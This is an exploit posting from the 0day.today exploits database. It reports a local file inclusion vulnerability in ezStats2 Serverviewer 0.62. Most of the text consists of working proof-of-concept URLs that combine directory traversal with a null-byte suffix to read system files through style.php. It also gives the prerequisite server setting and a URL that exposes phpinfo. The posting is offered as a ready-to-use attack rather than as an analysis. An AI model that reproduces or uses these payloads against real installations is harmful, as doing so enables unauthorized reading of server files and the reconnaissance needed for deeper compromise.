[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

ezStats2 Serverviewer 0.62 Local File Inclusion Vulnerability

Author
L0n3ly-H34rT
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-20305
Category
web applications
Date add
06-02-2013
Platform
php
#################################################
### Exploit Title: ezStats2 Serverviewer v0.62 Local File Inclusion Vulnerability
### Date: 02/05/2013
### Author: L0n3ly-H34rT
### Contact: l0n3ly_h34rt@hotmail.com
### My Site: http://se3c.blogspot.com/
### Vendor Link: http://www.ezstats.org/
### Software Link: http://ezstats.googlecode.com/files/ezStats2_Serverviewer_v0.62.zip
### Tested on: Linux/Windows 
#################################################

http://127.0.0.1/ezServer/stylesheets/style.php?files=../../../../../../../../../../windows/win.ini%00.jpg

http://127.0.0.1/ezServer/admin/stylesheets/style.php?files=../../../../../../../../../../windows/win.ini%00.jpg

############################################

# Notes :

1- Must be magic_quotes_gpc = Off

2- phpinfo() :

http://127.0.0.1/ezServer/admin/apitest.php?info

# Greetz to my friendz

#  0day.today [2024-11-10]  #